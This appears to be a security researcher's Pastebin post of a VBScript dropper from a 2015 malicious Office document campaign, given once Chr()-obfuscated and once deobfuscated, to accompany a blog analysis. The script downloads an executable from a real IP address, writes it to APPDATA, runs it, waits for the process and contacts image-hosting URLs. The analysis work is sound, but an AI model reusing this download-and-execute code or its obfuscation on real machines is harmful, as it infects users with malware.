SHARE
TWEET

Deobfuscated VBscript

bartblaze May 8th, 2015 (edited) 318 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Obfuscated + deobfuscated VBscript used in latest Office maldoc campaign.
  2. Related blog post: http://bartblaze.blogspot.com/2015/05/new-malicious-office-docs-trick.html
  3.  
  4.  
  5. <== obfuscated: ===>
  6. dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
  7. dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
  8. HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
  9. HGyu87f7Usf.Send
  10. Set dfgfderer = WScript.CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) ).Environment(Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
  11. iyUGbuwerff = dfgfderer(Chr(65) & Chr(80) & Chr(80) & Chr(68) & Chr(65) & Chr(84) & Chr(65) )
  12. iyUGUIvbuiwe7vhJ = iyUGbuwerff + Chr(92) & Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)  
  13. with oUIOGuiwefff
  14.    .type = 1  
  15.     .open
  16.     .write HGyu87f7Usf.responseBody
  17.     .savetofile iyUGUIvbuiwe7vhJ, 2  
  18. end with
  19. Set uyGUYhi8wef = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110) )
  20. uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
  21.  
  22. dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
  23. dim jhvHVKfdg: Set jhvHVKfdg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
  24. JHyygUBjdfg.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(111) & Chr(114) & Chr(103) & Chr(47) & Chr(55) & Chr(50) & Chr(54) & Chr(48) & Chr(52) & Chr(48) & Chr(54) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
  25. JHyygUBjdfg.Send
  26.  
  27. Set fdhtrewfwef = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(116) & Chr(115) & Chr(58) & Chr(92) & Chr(92) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50) )
  28. Do
  29. Running = False
  30. Set colItems = fdhtrewfwef.ExecQuery(Chr(83) & Chr(101) & Chr(108) & Chr(101) & Chr(99) & Chr(116) & Chr(32) & Chr(42) & Chr(32) & Chr(102) & Chr(114) & Chr(111) & Chr(109) & Chr(32) & Chr(87) & Chr(105) & Chr(110) & Chr(51) & Chr(50) & Chr(95) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
  31. For Each objItem In colItems
  32. If objItem.Name = Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)  Then
  33. Running = True
  34. Exit For
  35. End If
  36. Next
  37. If Not Running Then
  38. WScript.Sleep 3000
  39. End If
  40. Loop While Not Running
  41. dim sdfsdfsdf: Set sdfsdfsdf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
  42. dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
  43. sdfsdfsdf.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(110) & Chr(101) & Chr(116) & Chr(47) & Chr(54) & Chr(56) & Chr(53) & Chr(54) & Chr(49) & Chr(52) & Chr(57) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
  44. sdfsdfsdf.Send
  45.  
  46.  
  47. =========================================================================================================
  48.  
  49.  
  50.  
  51. <== deobfuscated: ===>
  52. dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Microsoft.XMLHTTP )
  53. dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Adodb.Stream )
  54. HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
  55. HGyu87f7Usf.Send
  56. Set dfgfderer = WScript.CreateObject(WScript.Shell ).Environment(Process )
  57. iyUGbuwerff = dfgfderer(APPDATA )
  58. iyUGUIvbuiwe7vhJ = iyUGbuwerff + \o8237423.exe
  59. with oUIOGuiwefff
  60.    .type = 1
  61.     .open
  62.     .write HGyu87f7Usf.responseBody
  63.     .savetofile iyUGUIvbuiwe7vhJ, 2
  64. end with
  65. Set uyGUYhi8wef = CreateObject(Shell.Application )
  66. uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
  67.  
  68. dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Microsoft.XMLHTTP )
  69. dim jhvHVKfdg: Set jhvHVKfdg = createobject(Adodb.Stream )
  70. JHyygUBjdfg.Open GET , http://savepic.org/7260406.jpg , False
  71. JHyygUBjdfg.Send
  72.  
  73. Set fdhtrewfwef = GetObject(winmgmts:\\.\root\cimv2 )
  74. Do
  75. Running = Falsepasteb
  76. Set colItems = fdhtrewfwef.ExecQuery(Select * from Win32_Process )
  77. For Each objItem In colItems
  78. If objItem.Name = o8237423.exe  Then
  79. Running = True
  80. Exit For
  81. End If
  82. Next
  83. If Not Running Then
  84. WScript.Sleep 3000
  85. End If
  86. Loop While Not Running
  87. dim sdfsdfsdf: Set sdfsdfsdf = createobject(Microsoft.XMLHTTP )
  88. dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Adodb.Stream )
  89. sdfsdfsdf.Open GET , http://savepic.net/6856149.jpg , False
  90. sdfsdfsdf.Send
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top